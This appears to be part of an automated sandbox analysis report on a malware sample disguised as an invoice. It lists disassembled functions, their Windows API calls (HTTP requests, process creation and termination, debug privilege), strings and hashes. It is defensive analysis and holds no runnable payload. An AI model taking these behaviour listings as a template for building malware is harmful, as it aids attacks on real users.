                                                              • Instruction ID: af309a0cb0b2be2de64bd5ac5428a8678920d5b98588a465a296764330ff68e8
                                                              • Opcode Fuzzy Hash: ecbb72a7074d6ac806f1528bf5f82c4f6a94e226a43bcadd241822de73b23db4
                                                              • Instruction Fuzzy Hash: 50712670A2020ADFCF21CF64DC85AEA3BB5FF49314F24426AED59561A6D7708CA1DF50
                                                              Function 0025ECD4 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 149windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 0020B34E: GetWindowLongW.USER32(?,000000EB), ref: 0020B35F
                                                                • Part of subcall function 0020B63C: GetCursorPos.USER32(000000FF), ref: 0020B64F
                                                                • Part of subcall function 0020B63C: ScreenToClient.USER32(00000000,000000FF), ref: 0020B66C
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000001), ref: 0020B691
                                                                • Part of subcall function 0020B63C: GetAsyncKeyState.USER32(00000002), ref: 0020B69F
                                                              • ImageList_DragLeave.COMCTL32(00000000,00000000,00000001,?,?,?), ref: 0025ED3C
                                                              • ImageList_EndDrag.COMCTL32 ref: 0025ED42
                                                              • ReleaseCapture.USER32 ref: 0025ED48
                                                              • SetWindowTextW.USER32(?,00000000), ref: 0025EDF0
                                                              • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 0025EE03
                                                              • DefDlgProcW.USER32(?,00000202,?,?,00000000,00000001,?,?,?), ref: 0025EEDC
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: AsyncDragImageList_StateWindow$CaptureClientCursorLeaveLongMessageProcReleaseScreenSendText
                                                              • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                              • API String ID: 1924731296-2107944366
                                                              • Opcode ID: 88029a6274db10ef175587be99286eb1edc2e855d0d1d24289ad925b85ec04b6
                                                              • Instruction ID: 2baf1acb7a393faa691b7be4b28f6cb731378ea299be7af841648a2bf8a715c6
                                                              • Opcode Fuzzy Hash: 88029a6274db10ef175587be99286eb1edc2e855d0d1d24289ad925b85ec04b6
                                                              • Instruction Fuzzy Hash: 4A51BC30114304AFD714EF20EC9AF6A77F8FB88714F504A1DF995962E2DB709968CB52
                                                              Function 002445C4 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 133networkCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 002445FF
                                                              • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 0024462B
                                                              • InternetQueryOptionW.WININET(00000000,0000001F,00000000,?), ref: 0024466D
                                                              • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00244682
                                                              • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0024468F
                                                              • HttpQueryInfoW.WININET(00000000,00000005,?,?,00000000), ref: 002446BF
                                                              • InternetCloseHandle.WININET(00000000), ref: 00244706
                                                                • Part of subcall function 00245052: GetLastError.KERNEL32(?,?,002443CC,00000000,00000000,00000001), ref: 00245067
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Internet$Http$OptionQueryRequest$CloseConnectErrorHandleInfoLastOpenSend
                                                              • String ID:
                                                              • API String ID: 1241431887-3916222277
                                                              • Opcode ID: 5781e60277000043a3bc0e7cb0d4769a152ec612a8231fb73fb787d4492a30bf
                                                              • Instruction ID: ee6bedbb8cb82737a30e803269aea43dc00320d512599f8f6617a93a4f8759a0
                                                              • Opcode Fuzzy Hash: 5781e60277000043a3bc0e7cb0d4769a152ec612a8231fb73fb787d4492a30bf
                                                              • Instruction Fuzzy Hash: 96418EB1511219BFEB0AAF50DC89FBB77ACFF09354F104116FA059A141D7B09D548BA4
                                                              Function 0024B644 Relevance: 13.9, APIs: 9, Instructions: 432COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetModuleFileNameW.KERNEL32(?,?,00000104,?,0028DC00), ref: 0024B715
                                                              • FreeLibrary.KERNEL32(00000000,00000001,00000000,?,0028DC00), ref: 0024B749
                                                              • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 0024B8C1
                                                              • SysFreeString.OLEAUT32(?), ref: 0024B8EB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Free$FileLibraryModuleNamePathQueryStringType
                                                              • String ID:
                                                              • API String ID: 560350794-0
                                                              • Opcode ID: 9d276be8388a2d94e4542bd4b63f74f57e6e6b1f172247afa7dbd2f530661a01
                                                              • Instruction ID: cd213ed5afd5d2070d434210dd321354740c1932feb574f61a9f370404831ece
                                                              • Opcode Fuzzy Hash: 9d276be8388a2d94e4542bd4b63f74f57e6e6b1f172247afa7dbd2f530661a01
                                                              • Instruction Fuzzy Hash: D1F13871A10219AFCF09DF94C888EAEB7B9FF49315F148458F905AB250DB71EE52CB90
                                                              Function 002524D4 Relevance: 13.9, APIs: 9, Instructions: 376processCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • _memset.LIBCMT ref: 002524F5
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00252688
                                                              • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 002526AC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 002526EC
                                                              • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 0025270E
                                                              • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0025286F
                                                              • GetLastError.KERNEL32(00000000,00000001,00000000), ref: 002528A1
                                                              • CloseHandle.KERNEL32(?), ref: 002528D0
                                                              • CloseHandle.KERNEL32(?), ref: 00252947
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Directory$CloseCurrentHandleSystem$CreateErrorLastProcess_memset
                                                              • String ID:
                                                              • API String ID: 4090791747-0
                                                              • Opcode ID: 6b6e4da188a62dac41da943207aa495d3913e2be85e1ca3543f38d9b46397a89
                                                              • Instruction ID: dbaf2065259dfb246b48ab6c559d9543d2721565f7dd08b053419512b9aa7689
                                                              • Opcode Fuzzy Hash: 6b6e4da188a62dac41da943207aa495d3913e2be85e1ca3543f38d9b46397a89
                                                              • Instruction Fuzzy Hash: E4D1AB71614201DFCB14EF24C891A6ABBE5AF86310F18855DF8899B2E2DB31DC58CF96
                                                              Function 0025B33A Relevance: 13.7, APIs: 9, Instructions: 167COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • InvalidateRect.USER32(?,00000000,00000001,?,00000001), ref: 0025B3F4
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: InvalidateRect
                                                              • String ID:
                                                              • API String ID: 634782764-0
                                                              • Opcode ID: 39b503fd226d2a5065cbf9031de5132917d84ea2c73cd9998b19f0b7cd46ef2e
                                                              • Instruction ID: 5b2108de0de5d975624770e375968aedb3a7eeac362804e2779aef2190667194
                                                              • Opcode Fuzzy Hash: 39b503fd226d2a5065cbf9031de5132917d84ea2c73cd9998b19f0b7cd46ef2e
                                                              • Instruction Fuzzy Hash: 9951E330530205BFEF369F28DC99BAD7B68AF04316F644011FE14E61E2D771E9A88B58
                                                              Function 0020A699 Relevance: 13.7, APIs: 9, Instructions: 163windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadImageW.USER32(00000000,?,00000001,00000010,00000010,00000010), ref: 0026DB1B
                                                              • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 0026DB3C
                                                              • LoadImageW.USER32(00000000,?,00000001,00000000,00000000,00000050), ref: 0026DB51
                                                              • ExtractIconExW.SHELL32(?,00000000,?,00000000,00000001), ref: 0026DB6E
                                                              • SendMessageW.USER32(00000000,00000080,00000000,00000000), ref: 0026DB95
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0020A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0026DBA0
                                                              • SendMessageW.USER32(00000000,00000080,00000001,00000000), ref: 0026DBBD
                                                              • DestroyIcon.USER32(00000000,?,?,?,?,?,?,0020A67C,00000000,00000000,00000000,000000FF,00000000,000000FF,000000FF), ref: 0026DBC8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Icon$DestroyExtractImageLoadMessageSend
                                                              • String ID:
                                                              • API String ID: 1268354404-0
                                                              • Opcode ID: a25974f018535630b63ee5ac0787b36c9f65ad54c1f114b8ac0e3e113bf1ae3c
                                                              • Instruction ID: bc2dda5875ff99b21e5d09d351b85ff3490f1aa1f5c6bfa48276d2f812cbe29f
                                                              • Opcode Fuzzy Hash: a25974f018535630b63ee5ac0787b36c9f65ad54c1f114b8ac0e3e113bf1ae3c
                                                              • Instruction Fuzzy Hash: 4B518B70A20309EFDB24DF68DC95FAA77B8AF48354F504618F946972E1D7B0ACA0DB50
                                                              Function 00237555 Relevance: 13.6, APIs: 9, Instructions: 142filestringCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00235FA6,?), ref: 00236ED8
                                                                • Part of subcall function 00236EBB: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00235FA6,?), ref: 00236EF1
                                                                • Part of subcall function 002372CB: GetFileAttributesW.KERNEL32(?,00236019), ref: 002372CC
                                                              • lstrcmpiW.KERNEL32(?,?), ref: 002375CA
                                                              • _wcscmp.LIBCMT ref: 002375E2
                                                              • MoveFileW.KERNEL32(?,?), ref: 002375FB
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: FileFullNamePath$AttributesMove_wcscmplstrcmpi
                                                              • String ID:
                                                              • API String ID: 793581249-0
                                                              • Opcode ID: febc323e3bbb9d591cb52c871fc7375a2a6930c6e0629232a4ee44f657bdeedf
                                                              • Instruction ID: 19df3553e509171e4045e2e3ac4f2a0f0209fcf88a892ad38bc0b4dbe2962c66
                                                              • Opcode Fuzzy Hash: febc323e3bbb9d591cb52c871fc7375a2a6930c6e0629232a4ee44f657bdeedf
                                                              • Instruction Fuzzy Hash: B05131F2A192195ADF64EF94D885DDE73BCAF08310F5040AAFA09E3141EA7496D9CF60
                                                              Function 0020EA69 Relevance: 13.6, APIs: 9, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0020EAEB
                                                              • ShowWindow.USER32(00000000,00000000,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0020EB32
                                                              • ShowWindow.USER32(00000000,00000006,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0026DC86
                                                              • ShowWindow.USER32(00000000,000000FF,00000000,00000000,00000000,?,0026DAD1,00000004,00000000,00000000), ref: 0026DCF2
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: ShowWindow
                                                              • String ID:
                                                              • API String ID: 1268545403-0
                                                              • Opcode ID: af56df50e9114c723474d77129153b5b92163d45eedf7d1354f21fd03ecdae7e
                                                              • Instruction ID: 87d7a7915cc8fd209c4d252a34ffa534c6e631cae81925c778c38922fc631abe
                                                              • Opcode Fuzzy Hash: af56df50e9114c723474d77129153b5b92163d45eedf7d1354f21fd03ecdae7e
                                                              • Instruction Fuzzy Hash: CA41E7707357859BDF394F28998DB3A7A99BF45308F5B0C0AE04B865E3C6B0B8E0C611
                                                              Function 0022B263 Relevance: 13.5, APIs: 9, Instructions: 49memorythreadCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • GetProcessHeap.KERNEL32(00000008,0000000C,00000000,00000000,?,0022AEF1,00000B00,?,?), ref: 0022B26C
                                                              • HeapAlloc.KERNEL32(00000000,?,0022AEF1,00000B00,?,?), ref: 0022B273
                                                              • GetCurrentProcess.KERNEL32(00000000,00000000,00000000,00000002,?,0022AEF1,00000B00,?,?), ref: 0022B288
                                                              • GetCurrentProcess.KERNEL32(?,00000000,?,0022AEF1,00000B00,?,?), ref: 0022B290
                                                              • DuplicateHandle.KERNEL32(00000000,?,0022AEF1,00000B00,?,?), ref: 0022B293
                                                              • GetCurrentProcess.KERNEL32(00000008,00000000,00000000,00000002,?,0022AEF1,00000B00,?,?), ref: 0022B2A3
                                                              • GetCurrentProcess.KERNEL32(0022AEF1,00000000,?,0022AEF1,00000B00,?,?), ref: 0022B2AB
                                                              • DuplicateHandle.KERNEL32(00000000,?,0022AEF1,00000B00,?,?), ref: 0022B2AE
                                                              • CreateThread.KERNEL32(00000000,00000000,0022B2D4,00000000,00000000,00000000), ref: 0022B2C8
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$Current$DuplicateHandleHeap$AllocCreateThread
                                                              • String ID:
                                                              • API String ID: 1957940570-0
                                                              • Opcode ID: 5fe671c2605dc9face8a5984c86850487aaeb15b14049bc56e48361cf4a5268d
                                                              • Instruction ID: f0c7a70634c7e215ca8a1e1face002de1d038eb2c63906af571d79b9af6992f9
                                                              • Opcode Fuzzy Hash: 5fe671c2605dc9face8a5984c86850487aaeb15b14049bc56e48361cf4a5268d
                                                              • Instruction Fuzzy Hash: B601B6B5240308BFE710ABA5EC4DF6B7BACEF89711F418451FA09DB1A1CA749840CF61
                                                              Function 0024C43F Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 401COMMON
                                                              Download Yara Rule
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID:
                                                              • String ID: NULL Pointer assignment$Not an Object type
                                                              • API String ID: 0-572801152
                                                              • Opcode ID: 55c7a01c1895ab19adbd677496ba3f12259edc5f7ddc81080efc5aebf70a8cac
                                                              • Instruction ID: fd9086b913c737fcdccba2413d1c4f9ccb3554c2c7f6b36cc06b214f80cdb8d5
                                                              • Opcode Fuzzy Hash: 55c7a01c1895ab19adbd677496ba3f12259edc5f7ddc81080efc5aebf70a8cac
                                                              • Instruction Fuzzy Hash: 82E1E971A1121AAFDF58DFA8D841BAEB7B9EF48314F248029F905AB281D770ED51CF50
                                                              Function 002416DA Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 309COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 001F936C: __swprintf.LIBCMT ref: 001F93AB
                                                                • Part of subcall function 001F936C: __itow.LIBCMT ref: 001F93DF
                                                                • Part of subcall function 0020C6F4: _wcscpy.LIBCMT ref: 0020C717
                                                              • _wcstok.LIBCMT ref: 0024184E
                                                              • _wcscpy.LIBCMT ref: 002418DD
                                                              • _memset.LIBCMT ref: 00241910
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: _wcscpy$__itow__swprintf_memset_wcstok
                                                              • String ID: X$p2*l2*
                                                              • API String ID: 774024439-2958633995
                                                              • Opcode ID: efadf0181db2e43892544759ee2672d3ae4301e0a7f74df724493543c48c6e29
                                                              • Instruction ID: 325359c9a06cdeae09e283a92d7c472897a30cfaf09acad976161678612b9859
                                                              • Opcode Fuzzy Hash: efadf0181db2e43892544759ee2672d3ae4301e0a7f74df724493543c48c6e29
                                                              • Instruction Fuzzy Hash: BEC1B1756143459FC724EF24C981AAEB7E5FF95350F00492DFA89972A2DB30EC64CB82
                                                              Function 00259A75 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 142windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • SendMessageW.USER32(00000000,00001036,00000010,00000010), ref: 00259B19
                                                              • SendMessageW.USER32(?,00001036,00000000,?), ref: 00259B2D
                                                              • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00259B47
                                                              • _wcscat.LIBCMT ref: 00259BA2
                                                              • SendMessageW.USER32(?,00001057,00000000,?), ref: 00259BB9
                                                              • SendMessageW.USER32(?,00001061,?,0000000F), ref: 00259BE7
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: MessageSend$Window_wcscat
                                                              • String ID: SysListView32
                                                              • API String ID: 307300125-78025650
                                                              • Opcode ID: 99a59acf89cf261c9a469b93d822516c4769bfdc6c0af46b1cac4d18dfe5d63d
                                                              • Instruction ID: a0d950a936e9acd27ba73b55c06a5220a34f4d06fdf65301702eed11cb6f0df8
                                                              • Opcode Fuzzy Hash: 99a59acf89cf261c9a469b93d822516c4769bfdc6c0af46b1cac4d18dfe5d63d
                                                              • Instruction Fuzzy Hash: 2641D370910309EBEB21DF64DC85BEE77B8EF08351F00042AF949A7291C6B19DD8CB64
                                                              Function 0025172F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 135COMMON
                                                              Download Yara Rule
                                                              APIs
                                                                • Part of subcall function 00236532: CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,?,00000000), ref: 00236554
                                                                • Part of subcall function 00236532: Process32FirstW.KERNEL32(00000000,0000022C), ref: 00236564
                                                                • Part of subcall function 00236532: CloseHandle.KERNEL32(00000000,?,00000000), ref: 002365F9
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 0025179A
                                                              • GetLastError.KERNEL32 ref: 002517AD
                                                              • OpenProcess.KERNEL32(00000001,00000000,?), ref: 002517D9
                                                              • TerminateProcess.KERNEL32(00000000,00000000), ref: 00251855
                                                              • GetLastError.KERNEL32(00000000), ref: 00251860
                                                              • CloseHandle.KERNEL32(00000000), ref: 00251895
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166107679.00000000002B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_2_2_1f0000_ORIGINAL INVOICE COAU7230734290.jbxd
                                                              Similarity
                                                              • API ID: Process$CloseErrorHandleLastOpen$CreateFirstProcess32SnapshotTerminateToolhelp32
                                                              • String ID: SeDebugPrivilege
                                                              • API String ID: 2533919879-2896544425
                                                              • Opcode ID: 213bd14e8270ef07c995f0148e331d8f8768b6b5b9b7648ec9a359186f41ab85
                                                              • Instruction ID: f6110d812bcb7a3e07695516a17bcdabf0ff28a8d28601f92e0cb768b6fbe690
                                                              • Opcode Fuzzy Hash: 213bd14e8270ef07c995f0148e331d8f8768b6b5b9b7648ec9a359186f41ab85
                                                              • Instruction Fuzzy Hash: A841EE71710201AFEB15EF54C899F6DB7A1AF14701F048059F90A9F2C2DBB4A968CF95
                                                              Function 00235819 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 81windowCOMMON
                                                              Download Yara Rule
                                                              APIs
                                                              • LoadIconW.USER32(00000000,00007F03), ref: 002358B8
                                                              Strings
                                                              Memory Dump Source
                                                              • Source File: 00000002.00000002.2165959815.00000000001F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 001F0000, based on PE: true
                                                              • Associated: 00000002.00000002.2165939555.00000000001F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000027D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166026078.000000000029E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000002.00000002.2166084963.00000000002AA000.00000004.00000001.01000000.00000003.sdmpDownload File
